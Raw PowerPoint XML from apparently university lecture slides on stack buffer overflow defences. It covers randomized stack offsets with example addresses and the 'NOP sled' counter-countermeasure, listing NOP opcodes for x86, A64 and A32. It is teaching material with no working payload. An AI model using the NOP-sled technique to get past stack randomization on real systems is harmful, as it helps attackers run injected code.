              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="002060"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" err="1">
                    <a:solidFill>
                      <a:srgbClr val="002060"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>i</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="002060"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="141" name="Group 140">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2D2DC92-ADB0-8E4F-9707-6919F4EBC601}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="2192004"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="142" name="Rectangle 141">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE2DB249-0F9E-F544-851F-511ED5E5F7BB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920884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3" name="Rectangle 142">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0607153-546F-FF4B-8758-B01D044E7441}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="945061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4" name="Rectangle 143">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9284244-B9AA-7C4E-B723-450DF8FE8CFA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9692388"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5" name="Rectangle 144">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4D0150D-5736-FA4C-95E3-2370B90D4BE1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9934159" y="3986006"/>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6" name="Rectangle 145">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{078553CA-9672-7F4F-A65C-5B2609A2629A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10179379" y="3986005"/>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7" name="Rectangle 146">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CD72721-6755-CA41-9431-07EE5A480029}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1042149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8" name="Rectangle 147">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4A9ABEB-B0E0-2740-A069-B7865422440F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10666711"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sp>
            <p:nvSpPr>
              <p:cNvPr id="149" name="Rectangle 148">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECB57843-812B-134D-9A13-41C43CC0C534}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10903803" y="3986002"/>
                <a:ext cx="245220" cy="24522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ucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69587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randombar(vertic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randombar(vertical)">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System-Level Protections</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1. Randomized Stack Offset</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Content Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA2FD321-E9E8-9E42-AB28-B6ABE2D44AD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="7898409" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At start of program, allocate random amount of space on stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shifts stack address for entire program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Makes it harder to predict buffer’s address of injected code</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38</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2" name="Right Brace 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65E20086-2D68-9A4C-ADF3-743718B27871}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10656449" y="4609583"/>
            <a:ext cx="277793" cy="1713297"/>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98E81CB-6305-0547-8B05-A00D6BE4AB59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10934242" y="5149822"/>
            <a:ext cx="888705" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Callee’s</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Right Brace 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E89BB6AA-E1C3-4D4C-AB46-0B5E1711D3F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10656451" y="2890911"/>
            <a:ext cx="277791" cy="1685202"/>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43AE17AD-B3A8-0742-ADFD-2357E6EBBB41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10934243" y="3410346"/>
            <a:ext cx="888705" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caller’s</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Right Brace 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B73723F-3B7C-3942-A9A5-6538D76A09F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10656449" y="1534939"/>
            <a:ext cx="277793" cy="798653"/>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2013FD7C-DFBE-1246-9F71-22A80B93F96F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7468251" y="806917"/>
            <a:ext cx="1123193" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Random</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allocation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F384A1D6-8ADA-8C41-925E-0EE675269D9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6787588" y="1525097"/>
            <a:ext cx="3646024" cy="4995962"/>
            <a:chOff x="6588078" y="1369584"/>
            <a:chExt cx="3646024" cy="4995962"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rectangle 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2136AC46-0257-CB41-9CDB-34959A1ECFF2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8764118" y="1369584"/>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8E523807-629B-304F-9D4C-AA674A74B090}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8764118" y="2168238"/>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2" name="Rectangle 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69895580-A198-6643-B7FB-B363040169FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8764118" y="2739569"/>
              <a:ext cx="1469984" cy="11432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ED92C1CD-9315-7E47-9392-2EB2204A7F44}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8764118" y="3886937"/>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4" name="Rectangle 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{104F5E3F-5110-3044-9842-A5CEA941543D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8764118" y="4454070"/>
              <a:ext cx="1469984" cy="172681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TextBox 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56BD699F-55DF-9248-98CF-2F87B16F84FC}"/>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6" name="Straight Arrow Connector 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9470737C-AE87-4D41-98EC-DC66CC31C34F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="25"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9E8927C6-57F7-3641-BB3F-DC76C78C6578}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8959448" y="5298217"/>
            <a:ext cx="1469984" cy="467508"/>
            <a:chOff x="9124092" y="5147021"/>
            <a:chExt cx="1305340" cy="467508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Rectangle 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7070891-F3E7-3145-8BA1-C0557EF0CAB5}"/>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352149-E3DA-F44B-A84F-9B53E5728F32}"/>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BB88D9E-4015-4144-9FE2-30B7C482E8F3}"/>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ACEEB7-7064-A148-811C-7F81085E0C3C}"/>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0D6AA34-B38C-5C47-9EDB-704C8A45A83E}"/>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133E93-C158-324E-97D8-934F09EE4D0C}"/>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F023281-72D7-BC4E-81DD-41FE19987FD6}"/>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99E4E44-5B39-8348-BB4C-8CBE91E8D58B}"/>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BDC3CAB1-58D8-4441-BE61-99CA2C22167F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6787588" y="5347287"/>
            <a:ext cx="1408527" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="37" name="Straight Arrow Connector 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FCE8E0F-07F6-8F4C-918A-1719993516EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="36" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8196115" y="5531953"/>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E9A13D4-2313-EB4A-815D-3E60A5574C2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8959448" y="737691"/>
            <a:ext cx="1469984" cy="798653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F7C1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ight Brace 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94735AD4-8B1D-9140-8E82-A70CA3F03E7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8564275" y="736286"/>
            <a:ext cx="277793" cy="798653"/>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D5DBC6FF-7B31-1E47-845A-0545481C6677}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9107817" y="351624"/>
            <a:ext cx="1170898" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack Base</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Rounded Rectangle 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{735D4B4E-7E4D-9540-8E2A-7273AB7E85B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578415" y="4065985"/>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0x7ffc43edef80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rounded Rectangle 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{067CF698-CAEE-C447-A032-D2245E611406}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4705989" y="5256336"/>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0x7ffe6e24d560</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Rounded Rectangle 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CD30F1A-45AC-1541-8850-D24D763CB2AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578415" y="5256336"/>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0x7ffe14b6fd80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Rounded Rectangle 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F528300D-7C2A-D54B-96EB-22BA856C7DDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4705989" y="4061011"/>
            <a:ext cx="3948951" cy="1087195"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x7ffd5f422ea0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174599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vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="42"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="8" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9" presetID="14" presetClass="entr" presetSubtype="5" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="12" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13" presetID="14" presetClass="entr" presetSubtype="5" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="43"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="16" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="17" presetID="14" presetClass="entr" presetSubtype="5" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="44"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(vertical)">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Counter-countermeasure</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NOP Sled</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9D5FDAA-D6CE-F440-9BB8-4F4050FE9554}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="7028145" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Precede exploit code with long series of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“no op” = “no operation” = “do nothing”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>x86: 0x90</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A64: 0xD503201F (“HINT: NOP”)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A32: 0xE1A00000 (“MOV R0, R0”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
